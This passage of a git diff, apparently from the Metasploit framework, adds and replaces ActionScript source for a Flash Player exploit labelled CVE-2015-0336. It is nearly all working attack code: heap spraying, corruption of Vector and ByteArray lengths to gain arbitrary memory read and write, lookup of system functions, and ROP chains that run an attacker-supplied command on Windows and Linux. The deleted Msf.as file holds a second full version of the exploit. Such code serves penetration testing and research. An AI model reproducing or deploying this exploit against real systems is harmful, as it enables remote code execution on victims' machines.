+// 5. Build with: mxmlc -o msf.swf Exploit.as
+
+// It uses some original code from @hdarwin89 for exploitation using ba's and vectors
+
+package
+{
+    import flash.display.Sprite
+    import flash.display.LoaderInfo
+    import flash.display.Loader
+    import flash.utils.ByteArray
+    import flash.utils.Endian
+    import flash.utils.* 
+    import flash.external.ExternalInterface
+    import mx.utils.Base64Decoder
+    
+
+    public class Exploit extends Sprite 
+    {
+        private var uv:Vector.<uint> = new Vector.<uint>
+        private var exploiter:Exploiter
+        
+        private var spray:Vector.<Object> = new Vector.<Object>(89698)
+        private var interval_id:uint
+        private var trigger_swf:String 
+        private var b64:Base64Decoder = new Base64Decoder()
+        private var payload:String
+        private var platform:String
+
+        public function Exploit() 
+        {
+            var i:uint = 0
+            platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+            trigger_swf = LoaderInfo(this.root.loaderInfo).parameters.tr
+            var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+            var pattern:RegExp = / /g;
+            b64_payload = b64_payload.replace(pattern, "+")
+            b64.decode(b64_payload)
+            payload = b64.toByteArray().toString()
+            
+            if (platform == 'win') { 
+                for (i = 0; i < 89698; i = i + 1) {
+                    spray[i] = new Vector.<uint>(1014)
+                    spray[i][0] = 0xdeadbeef
+                    spray[i][1] = 0xdeedbeef
+                    spray[i][2] = i
+                    spray[i][29] = 0x1a1e1429
+                }
+
+                for(i = 0; i < 89698; i = i + 1) {
+                    spray[i].length = 0x1e
+                }
+            } else if (platform == 'linux') { 
+                for (i = 0; i < 89698; i = i + 1) {
+                    spray[i] = new Vector.<uint>(1022)
+                    spray[i][0] = 0xdeadbeef
+                    spray[i][1] = 0xdeedbeef
+                    spray[i][2] = i
+                    spray[i][29] = 0x956c1490   // 0x956c1490 + 0xb6c => 0x956c1ffc => controlled by position 1021
+                    spray[i][39] = 1            // 0x956c1fac + 0xf8 => is_connected = 1 in order to allow corruption of offsets 0x54 and 0x58
+                    spray[i][1021] = 0x956c1fac // 0x956c1fac + 0x54 => 0x956c2000 (0x54, and 0x58 offsets are corrupted)
+                }
+            }
+    
+            var trigger_byte_array:ByteArray = createByteArray(trigger_swf)
+            trigger_byte_array.endian = Endian.LITTLE_ENDIAN
+            trigger_byte_array.position = 0
+            // Trigger corruption
+            var trigger_loader:Loader = new Loader()
+            trigger_loader.loadBytes(trigger_byte_array)
+
+            interval_id = setTimeout(do_exploit, 2000)
+        }
+
+
+        private function createByteArray(hex_string:String) : ByteArray {
+            var byte:String
+            var byte_array:ByteArray = new ByteArray()
+            var hex_string_length:uint = hex_string.length
+            var i:uint = 0
+            while(i < hex_string_length)
+            {
+                byte = hex_string.charAt(i) + hex_string.charAt(i + 1)
+                byte_array.writeByte(parseInt(byte,16))
+                i = i + 2
+            }
+            return byte_array
+        }
+
+        private function do_exploit():void {
+            clearTimeout(interval_id)
+
+            for(var i:uint = 0; i < spray.length; i = i + 1) {
+                if (spray[i].length != 1022 && spray[i].length != 0x1e) {
+                    Logger.log('[*] Exploit - Found corrupted vector at ' + i + ' with length 0x' + spray[i].length.toString(16))
+                    spray[i][0x3ffffffe] = 0xffffffff
+                    spray[i][0x3fffffff] = spray[i][1023]
+                    uv = spray[i]
+                }
+            }
+
+            for(i = 0; i < spray.length; i = i + 1) {
+                if (spray[i].length == 1022 || spray[i].length == 0x1e) {
+                    spray[i] = null
+                }
+            }
+
+            if (uv == null || uv.length != 0xffffffff) {
+                return
+            }
+
+            exploiter = new Exploiter(this, platform, payload, uv)
+        }
+    }
+}
+
diff --git a/external/source/exploits/CVE-2015-0336/ExploitByteArray.as b/external/source/exploits/CVE-2015-0336/ExploitByteArray.as
new file mode 100644
index 0000000000..0da3b307b4
--- /dev/null
+++ b/external/source/exploits/CVE-2015-0336/ExploitByteArray.as
@@ -0,0 +1,82 @@
+package
+{
+    import flash.utils.ByteArray
+    
+    public class ExploitByteArray
+    {
+        private const MAX_STRING_LENGTH:uint = 100
+        public var ba:ByteArray
+        public var original_length:uint
+        private var platform:String
+
+        public function ExploitByteArray(p:String, l:uint = 1024)
+        {
+            ba = new ByteArray()
+            ba.length = l
+            ba.endian = "littleEndian"
+            ba.writeUnsignedInt(0)
+            platform = p
+            original_length = l
+        }
+
+        public function set_length(length:uint):void
+        {
+            ba.length = length
+        }
+
+        public function get_length():uint
+        {
+            return ba.length
+        }
+
+        public function lets_ready():void
+        {
+            Logger.log("[*] ExploitByteArray - lets_ready()")
+            ba.endian = "littleEndian"
+            if (platform == "linux") {
+                ba.length = 0xffffffff
+            } 
+        }
+
+        public function is_ready():Boolean
+        {
+            Logger.log("[*] ExploitByteArray - is_ready() - 0x" + ba.length.toString(16))
+            if (ba.length == 0xffffffff)
+                return true
+
+            return false
+        }
+
+        public function read(addr:uint, type:String = "dword"):uint
+        {
+            ba.position = addr
+            switch(type) {
+                case "dword": 
+                    return ba.readUnsignedInt()
+                case "word":
+                    return ba.readUnsignedShort()
+                case "byte":
+                    return ba.readUnsignedByte()
+            }
+            return 0
+        }
+
+        public function read_string(addr:uint, length:uint = 0):String
+        {
+            ba.position = addr
+            if (length == 0)
+                return ba.readUTFBytes(MAX_STRING_LENGTH)
+            else
+                return ba.readUTFBytes(length) 
+        }
+
+        public function write(addr:uint, value:* = 0, zero:Boolean = true):void
+        {
+            if (addr) ba.position = addr
+            if (value is String) {
+                for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
+                if (zero) ba.writeByte(0)
+            } else ba.writeUnsignedInt(value)
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-0336/ExploitVector.as b/external/source/exploits/CVE-2015-0336/ExploitVector.as
new file mode 100644
index 0000000000..3d9c84b43b
--- /dev/null
+++ b/external/source/exploits/CVE-2015-0336/ExploitVector.as
@@ -0,0 +1,74 @@
+package
+{
+    public class ExploitVector
+    {
+        private var uv:Vector.<uint>
+        public var original_length:uint = 0x3e0 
+        
+        public function ExploitVector(v:Vector.<uint>)
+        {
+            uv = v
+        }
+
+        public function restore():void
+        {
+            uv[0x3ffffffe] = original_length
+        }
+
+        public function is_ready():Boolean
+        {
+            if (uv.length > original_length) 
+            {
+                return true
+            }
+            return false
+        } 
+        
+        public function at(pos:uint):uint
+        {
+            return uv[pos]
+        }
+
+        // pos: position where a Vector.<Object>[0] lives
+        public function set_own_address(pos:uint):void
+        {
+            uv[0] = uv[pos - 5] - ((pos - 5) * 4) - 0xc
+        }
+
+        public function read(addr:uint):uint
+        {
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            return uv[pos]
+        }
+
+        public function write(addr:uint, value:uint = 0):void
+        {           
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            uv[pos] = value
+        }
+
+        public function search_pattern(pattern:uint, limit:uint):uint
+        {
+            for (var i:uint = 0; i < limit/4; i++) {
+                if (uv[i] == pattern) {
+                    return i
+                }
+            }
+            throw new Error() 
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-0336/Exploiter.as b/external/source/exploits/CVE-2015-0336/Exploiter.as
new file mode 100644
index 0000000000..036ffceb04
--- /dev/null
+++ b/external/source/exploits/CVE-2015-0336/Exploiter.as
@@ -0,0 +1,251 @@
+package
+{ 
+    import flash.utils.ByteArray
+    import flash.system.System
+
+    public class Exploiter
+    {
+        private const VECTOR_OBJECTS_LENGTH:uint = 1014
+        private var exploit:Exploit
+        private var ev:ExploitVector
+        private var eba:ExploitByteArray
+        private var payload:String
+        private var platform:String
+        private var pos:uint
+        private var byte_array_object:uint
+        private var main:uint
+        private var stack_object:uint
+        private var payload_space_object:uint
+        private var buffer_object:uint
+        private var buffer:uint
+        private var vtable:uint
+        private var stack_address:uint
+        private var payload_address:uint 
+        private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
+        private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
+        private var spray:Vector.<Object> = new Vector.<Object>(89698)
+
+        public function Exploiter(exp:Exploit, pl:String, p: String, uv:Vector.<uint>):void
+        {
+            exploit = exp
+            payload = p
+            platform = pl
+
+            ev = new ExploitVector(uv)
+            if (!ev.is_ready()) return
+            eba = new ExploitByteArray(platform)
+            spray_objects()
+            try { pos = search_objects() } catch (err:Error) { ev.restore(); cleanup(); return; }
+            ev.set_own_address(pos)
+            if (!disclose_objects()) { ev.restore(); cleanup(); return; }
+            disclose_addresses()
+            corrupt_byte_array()
+            if (!eba.is_ready()) { ev.restore(); cleanup(); return }
+            do_rop()
+            restore_byte_array()
+            ev.restore()
+            cleanup()
+        }
+
+        private function spray_objects():void
+        {
+            Logger.log("[*] Exploiter - spray_objects()")
+            for (var i:uint = 0; i < spray.length; i++) 
+            {
+                spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
+                spray[i][0] = eba.ba
+                spray[i][1] = exploit 
+                spray[i][2] = stack
+                spray[i][3] = payload_space
+            } 
+        }
+        
+        private function search_objects():uint
+        {
+            Logger.log("[*] Exploiter - search_objects()")
+            var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0x4000)
+            return idx + 1
+        }
+
+        private function disclose_objects():Boolean
+        { 
+            Logger.log("[*] Exploiter - disclose_objects()")
+            byte_array_object = ev.at(pos) - 1
+            main = ev.at(pos + 1) - 1
+            stack_object = ev.at(pos + 2) - 1
+            payload_space_object = ev.at(pos + 3) - 1
+            if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
+                return false
+            }
+            return true
+        }
+
+        private function disclose_addresses():void
+        {
+            Logger.log("[*] Exploiter - disclose_addresses()")
+            if (platform == "linux") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x10)
+                buffer = ev.read(buffer_object + 0x1c)
+            }    
+            else if (platform == "win") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x40)
+                buffer = ev.read(buffer_object + 8)
+            }
+            vtable = ev.read(main)
+            stack_address = ev.read(stack_object + 0x18)
+            payload_address = ev.read(payload_space_object + 0x18)
+        }
+        
+        private function corrupt_byte_array():void
+        {
+            Logger.log("[*] Exploiter - corrupt_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c) // *array
+                ev.write(buffer_object + 0x20, 0xffffffff) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8) // *array
+                ev.write(buffer_object + 16, 0xffffffff) // capacity
+            }
+            eba.lets_ready()
+        }
+
+        private function restore_byte_array():void
+        { 
+            Logger.log("[*] Exploiter - restore_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c, buffer) // *array
+                ev.write(buffer_object + 0x20, 1024) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8, buffer) // *array
+                ev.write(buffer_object + 16, 1024) // capacity
+            }
+            eba.set_length(eba.original_length) 
+        }
+        
+        private function do_rop():void
+        {
+            Logger.log("[*] Exploiter - do_rop()")
+            if (platform == "linux")
+                do_rop_linux()
+            else if (platform == "win")
+                do_rop_windows()
+            else
+                return
+        }
+
+        private function do_rop_windows():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var kernel32:uint = pe.module("kernel32.dll", winmm)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
+            var winexec:uint = pe.procedure("WinExec", kernel32)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, winexec)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // WinExec
+            eba.write(0, buffer + 0x10)
+            eba.write(0, payload_address + 8)
+            eba.write(0)
+
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_linux():void
+        {
+            Logger.log("[*] Exploiter - do_rop_linux()")
+            var flash:Elf = new Elf(eba, vtable)
+            var feof:uint = flash.external_symbol('feof')
+            var libc:Elf = new Elf(eba, feof)
+            var popen:uint = libc.symbol("popen")
+            var mprotect:uint = libc.symbol("mprotect")
+            var xchgeaxespret:uint = flash.gadget("c394", 0x0000ffff)
+            var xchgeaxesiret:uint = flash.gadget("c396", 0x0000ffff)
+            var addesp2cret:uint = flash.gadget("c32cc483", 0xffffffff)
+
+            // Continuation of execution
+            // 1) Recover original vtable
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            // 2) Recover original stack
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi
+
+            // Put the popen parameters in memory
+            eba.write(payload_address + 8, 'r', true) // type
+            eba.write(payload_address + 0xc, payload, true) // command
+           
+            // Put the fake stack/vtable on memory 
+            eba.write(stack_address + 0x18024, xchgeaxespret) // Initial gadget, stackpivot
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // Save original stack on esi
+            eba.write(0, addesp2cret) //second pivot to preserver stack_address + 0x18024
+
+            // Return to mprotect()
+            eba.write(stack_address + 0x18034, mprotect)
+            // Return to stackpivot (jmp over mprotect parameters)
+            eba.write(0, addesp2cret)
+            // mprotect() arguments
+            eba.write(0, buffer) // addr
+            eba.write(0, 0x1000) // size
+            eba.write(0, 0x7)    // PROT_READ | PROT_WRITE | PROT_EXEC
+            // Return to popen()
+            eba.write(stack_address + 0x18068, popen)
+            // Return to CoE (fix stack and object vtable)
+            eba.write(0, buffer + 0x10)
+            // popen() argument
+            eba.write(0, payload_address + 0xc)
+            eba.write(0, payload_address + 8) 
+           
+            //call   DWORD PTR [eax+0x24]
+            //EAX: 0x41414141 ('AAAA')
+            //EDI: 0xad857088 ("AAAA\377")
+            eba.write(main, stack_address + 0x18000)
+            exploit.hasOwnProperty('msf')
+        }
+
+        private function cleanup():void
+        { 
+            Logger.log("[*] Exploiter - cleanup()")
+            spray = null
+            stack = null
+            payload_space = null
+            eba = null
+            ev = null
+            exploit = null
+            System.pauseForGCIfCollectionImminent(0)
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-0336/Logger.as b/external/source/exploits/CVE-2015-0336/Logger.as
new file mode 100644
index 0000000000..16c0447973
--- /dev/null
+++ b/external/source/exploits/CVE-2015-0336/Logger.as
@@ -0,0 +1,32 @@
+package 
+{
+    import flash.external.ExternalInterface
+
+    public class Logger {
+        private static const DEBUG:uint = 0
+ 
+        public static function alert(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("alert", str);
+            }
+        }
+
+        public static function log(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("console.log", str);
+            }
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-0336/Msf.as b/external/source/exploits/CVE-2015-0336/Msf.as
deleted file mode 100755
index fee7a99e95..0000000000
--- a/external/source/exploits/CVE-2015-0336/Msf.as
+++ /dev/null
@@ -1,321 +0,0 @@
-// Build how to:
-// 1. Download the AIRSDK, and use its compiler.
-// 2. Download the Flex SDK (4.6)
-// 3. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
-//      (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
-// 4. Build with: mxmlc -o msf.swf Msf.as
-
-// It uses original code from @hdarwin89 for exploitation using ba's and vectors 
-
-package
-{
-    import flash.utils.*
-    import flash.display.*
-    import flash.system.*
-    import mx.utils.Base64Decoder
-
-	public final class Msf extends Sprite {
-		private var interval_id:uint;
-		
-		private var trigger_swf:String = ""
-		
-		private var b64:Base64Decoder = new Base64Decoder();
-		private var payload:String = ""
-		
-		private var spray:Vector.<Object> = new Vector.<Object>(89698 + 100)
-		private var corrupted_index:uint = 0
-		private var restore_required:Boolean = false
-		
-		private var uv:Vector.<uint>
-		private var ba:ByteArray = new ByteArray()
-		private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
-		private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
-		
-		public function Msf()  {
-			var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
-			var pattern:RegExp = / /g;
-			b64_payload = b64_payload.replace(pattern, "+")
-			b64.decode(b64_payload)
-			payload = b64.toByteArray().toString()
-			trigger_swf = LoaderInfo(this.root.loaderInfo).parameters.tr
-			
-			ba.endian = "littleEndian"
-			ba.length = 1024
-			ba.writeUnsignedInt(0xdeedbeef)
-			ba.position = 0
-			
-			var i:uint = 0
-			
-			while (i < 89698) {
-				spray[i] = new Vector.<uint>(1014)
-				spray[i][0] = 0xdeadbeef
-				spray[i][1] = 0xdeedbeef
-				spray[i][2] = i
-				spray[i][29] = 0x1a1e1429
-				i++
-			}
-			
-			for(i = 0; i < 89698; i = i + 1) {
-				spray[i].length = 0x1e
-			}
-
-			for(i = 0; i < 100; i = i + 1) {
-				spray[i + 89698] = new Vector.<Object>(1014)
-				spray[i + 89698][0] = ba
-				spray[i + 89698][1] = this
-				spray[i + 89698][2] = stack
-				spray[i + 89698][3] = payload_space
-			}
-			
-			for(i = 0; i < 100; i = i + 1) {
-				spray[i + 89698].length = 114
-			}
-			
-			var trigger_byte_array:ByteArray = createByteArray(trigger_swf)
-			trigger_byte_array.endian = Endian.LITTLE_ENDIAN
-			trigger_byte_array.position = 0
-
-			// Trigger corruption
-			var trigger_loader:Loader = new Loader();
-			trigger_loader.loadBytes(trigger_byte_array);
-			
-			interval_id = setTimeout(exploit, 2000)
-        }
-        
-        public function createByteArray(hex_string:String) : ByteArray {
-			var byte:String = null;
-			var byte_array:ByteArray = new ByteArray();
-			var hex_string_length:uint = hex_string.length;
-			var i:uint = 0;
-			while(i < hex_string_length)
-			{
-				byte = hex_string.charAt(i) + hex_string.charAt(i + 1);
-				byte_array.writeByte(parseInt(byte,16));
-				i = i + 2;
-			}
-			return byte_array;
-		}
-		
-		public function exploit():void {
-			clearTimeout(interval_id)
-			
-			for(var i:uint = 0; i < spray.length; i = i + 1) {
-				if (spray[i].length != 0x1e) {
-					corrupted_index = corrupt_vector_uint(i)
-					restore_required = true
-					uv = spray[corrupted_index]
-					uv[0] = 0x1a1e3000 // We're being confident about the spray for exploitation anyway :-)
-					control_execution()
-					if (restore_required) {
-						restore_vector_uint()
-					}
-					break;
-				}
-			}
-		}
-		
-		// make it better, search and return error if it doesn't work :-)
-		public function corrupt_vector_uint(index:uint):uint {
-			spray[index][0x3fe] = 0xffffffff
-			return spray[index][0x402]
-		}
-		
-		public function restore_vector_uint():void {
-			var atom:uint = spray[corrupted_index][0x3fffffff]
-			spray[corrupted_index][0x3ffffbff] = atom
-			spray[corrupted_index][0x3ffffbfe] = 0x1e
-			// Restore vector corrupted by hand 
-			spray[corrupted_index][0x3ffffffe] = 0x1e
-		}
-		
-		public function control_execution():void {
-			// Use the corrupted Vector<uint> to search saved addresses
-			var object_vector_pos:uint = search_object_vector()
-			if (object_vector_pos == 0xffffffff) {
-				return
-			}
-			
-			var byte_array_object:uint = uv[object_vector_pos] - 1
-			var main:uint = uv[object_vector_pos + 1] - 1
-			var stack_object:uint = uv[object_vector_pos + 2] - 1
-			var payload_space_object:uint = uv[object_vector_pos + 3] - 1
-
-			// Use the corrupted Vector<uint> to disclose arbitrary memory
-			var buffer_object:uint = vector_read(byte_array_object + 0x40)
-			var buffer:uint = vector_read(buffer_object + 8)
-			var stack_address:uint = vector_read(stack_object + 0x18)
-			var payload_address:uint = vector_read(payload_space_object + 0x18)
-			var vtable:uint = vector_read(main)
-			
-			// Set the new ByteArray length
-			ba.endian = "littleEndian"
-			ba.length = 0x500000
-			
-			// Overwite the ByteArray data pointer and capacity
-			var ba_array:uint = buffer_object + 8
-			var ba_capacity:uint = buffer_object + 16
-			vector_write(ba_array)
-			vector_write(ba_capacity, 0xffffffff)
-			
-			// restoring the corrupted vector length since we don't need it anymore
-			restore_vector_uint()
-			restore_required = false
-			
-			var flash:uint = base(vtable)
-			var winmm:uint = module("winmm.dll", flash)
-			var kernel32:uint = module("kernel32.dll", winmm)
-			var virtualprotect:uint = procedure("VirtualProtect", kernel32)
-			var winexec:uint = procedure("WinExec", kernel32)
-			var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash)
-			var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash)
-
-			// Continuation of execution
-			byte_write(buffer + 0x10, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable
-			byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main
-			byte_write(0, "\x89\x03", false) // mov [ebx], eax
-			byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
-
-			// Put the payload (command) in memory
-			byte_write(payload_address + 8, payload, true); // payload
-
-			// Put the fake vtabe / stack on memory
-			byte_write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
-			byte_write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
-			byte_write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
-			byte_write(0, virtualprotect)
-
-			// VirtualProtect
-			byte_write(0, winexec)
-			byte_write(0, buffer + 0x10)
-			byte_write(0, 0x1000)
-			byte_write(0, 0x40)
-			byte_write(0, buffer + 0x8) // Writable address (4 bytes)
-
-			// WinExec
-			byte_write(0, buffer + 0x10)
-			byte_write(0, payload_address + 8)
-			byte_write(0)
-
-			byte_write(main, stack_address + 0x18000) // overwrite with fake vtable
-						
-			toString() // call method in the fake vtable
-		}
-		
-		private function search_object_vector():uint {
-			var i:uint = 0;
-			while (i < 89698 * 1024){
-				if (uv[i] == 114) {
-					return i + 1;
-				}
-				i++
-			}
-			return 0xffffffff
-		}
-		
-		// Methods to use the corrupted uint vector
-		
-		private function vector_write(addr:uint, value:uint = 0):void
-		{
-			var pos:uint = 0
-
-			if (addr > uv[0]) {
-				pos = ((addr - uv[0]) / 4) - 2
-			} else {
-				pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
-			}
-
-			uv[pos] = value
-		}
-
-		private function vector_read(addr:uint):uint
-		{
-			var pos:uint = 0
-
-			if (addr > uv[0]) {
-				pos = ((addr - uv[0]) / 4) - 2
-			} else {
-				pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
-			}
-
-			return uv[pos]
-		}
-		
-		// Methods to use the corrupted byte array for arbitrary reading/writing
-
-		private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void
-		{
-			if (addr) ba.position = addr
-			if (value is String) {
-				for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
-				if (zero) ba.writeByte(0)
-			} else ba.writeUnsignedInt(value)
-		}
-
-		private function byte_read(addr:uint, type:String = "dword"):uint
-		{
-			ba.position = addr
-			switch(type) {
-				case "dword":
-					return ba.readUnsignedInt()
-				case "word":
-					return ba.readUnsignedShort()
-				case "byte":
-					return ba.readUnsignedByte()
-			}
-			return 0
-		}
-
-		// Methods to search the memory with the corrupted byte array
-
-		private function base(addr:uint):uint
-		{
-			addr &= 0xffff0000
-			while (true) {
-				if (byte_read(addr) == 0x00905a4d) return addr
-				addr -= 0x10000
-			}
-			return 0
-		}
-
-		private function module(name:String, addr:uint):uint
-		{
-			var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80) 
-			var i:int = -1
-			while (true) {
-				var entry:uint = byte_read(iat + (++i) * 0x14 + 12)
-				if (!entry) throw new Error("FAIL!");
-				ba.position = addr + entry
-				var dll_name:String = ba.readUTFBytes(name.length).toUpperCase();
-				if (dll_name == name.toUpperCase()) {
-					break;
-				}
-			}
-			return base(byte_read(addr + byte_read(iat + i * 0x14 + 16)));
-		}
-
-		private function procedure(name:String, addr:uint):uint
-		{
-			var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78)
-			var numberOfNames:uint = byte_read(eat + 0x18)
-			var addressOfFunctions:uint = addr + byte_read(eat + 0x1c)
-			var addressOfNames:uint = addr + byte_read(eat + 0x20)
-			var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24)
-
-			for (var i:uint = 0; ; i++) {
-				var entry:uint = byte_read(addressOfNames + i * 4)
-				ba.position = addr + entry
-				if (ba.readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break
-			}
-			return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4)
-		}
-
-		private function gadget(gadget:String, hint:uint, addr:uint):uint
-		{
-			var find:uint = 0
-			var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50)
-			var value:uint = parseInt(gadget, 16)
-			for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break
-			return addr + i
-		}
-	}
-}
diff --git a/external/source/exploits/CVE-2015-0336/PE.as b/external/source/exploits/CVE-2015-0336/PE.as
new file mode 100644
index 0000000000..a80ade9321
--- /dev/null
+++ b/external/source/exploits/CVE-2015-0336/PE.as
@@ -0,0 +1,63 @@
+package
+{
+    public class PE
+    {
+        private var eba:ExploitByteArray
+
+        public function PE(ba:ExploitByteArray)
+        {
+            eba = ba
+        }
+
+        public function base(addr:uint):uint
+        {
+            Logger.log("[*] PE - base(): searching base for 0x" + addr.toString(16))
+            addr &= 0xffff0000
+            while (true) {
+                if (eba.read(addr) == 0x00905a4d) return addr
+                addr -= 0x10000
+            }
+            return 0
+        }
+
+        public function module(name:String, addr:uint):uint
+        {
+            var iat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x80), i:int = -1
+            var mod_name:String
+
+            while (true) {
+                var entry:uint = eba.read(iat + (++i) * 0x14 + 12)
+                if (!entry) throw new Error("FAIL!"); 
+                mod_name = eba.read_string(addr + entry, name.length)
+                if (mod_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return base(eba.read(addr + eba.read(iat + i * 0x14 + 16)))
+        }
+
+        public function procedure(name:String, addr:uint):uint
+        {
+            var eat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x78)
+            var numberOfNames:uint = eba.read(eat + 0x18)
+            var addressOfFunctions:uint = addr + eba.read(eat + 0x1c)
+            var addressOfNames:uint = addr + eba.read(eat + 0x20)
+            var addressOfNameOrdinals:uint = addr + eba.read(eat + 0x24)
+            var proc_name:String
+
+            for (var i:uint = 0; ; i++) {
+                var entry:uint = eba.read(addressOfNames + i * 4)
+                proc_name = eba.read_string(addr + entry, name.length + 2)
+                if (proc_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return addr + eba.read(addressOfFunctions + eba.read(addressOfNameOrdinals + i * 2, "word") * 4)
+        }
+
+        public function gadget(gadget:String, hint:uint, addr:uint):uint
+        {
+            var find:uint = 0
+            var limit:uint = eba.read(addr + eba.read(addr + 0x3c) + 0x50)
+            var value:uint = parseInt(gadget, 16)
+            for (var i:uint = 0; i < limit - 4; i++) if (value == (eba.read(addr + i) & hint)) break
+            return addr + i
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-0336/TriggerLinux/TriggerLinux.as2proj b/external/source/exploits/CVE-2015-0336/TriggerLinux/TriggerLinux.as2proj
new file mode 100755
index 0000000000..579960bd86
--- /dev/null
+++ b/external/source/exploits/CVE-2015-0336/TriggerLinux/TriggerLinux.as2proj
@@ -0,0 +1,60 @@
+<?xml version="1.0" encoding="utf-8"?>
+<project version="2">
+  <!-- Output SWF options -->
+  <output>
+    <movie outputType="Application" />
+    <movie input="" />
+    <movie path="trigger_linux.swf" />
+    <movie fps="30" />
+    <movie width="800" />
+    <movie height="600" />
+    <movie version="0" />
+    <movie minorVersion="0" />
+    <movie platform="Custom" />
+    <movie background="#FFFFFF" />
+  </output>
+  <!-- Other classes to be compiled into your SWF -->
+  <classpaths>
+    <class path="src" />
+  </classpaths>
+  <!-- Build options -->
+  <build>
+    <option verbose="False" />
+    <option strict="False" />
+    <option infer="False" />
+    <option useMain="True" />
+    <option useMX="False" />
+    <option warnUnusedImports="False" />
+    <option traceMode="FlashConnectExtended" />
+    <option traceFunction="" />
+    <option libraryPrefix="" />
+    <option excludeFile="" />
+    <option groupClasses="False" />
+    <option frame="1" />
+    <option keep="True" />
+  </build>
+  <!-- Class files to compile (other referenced classes will automatically be included) -->
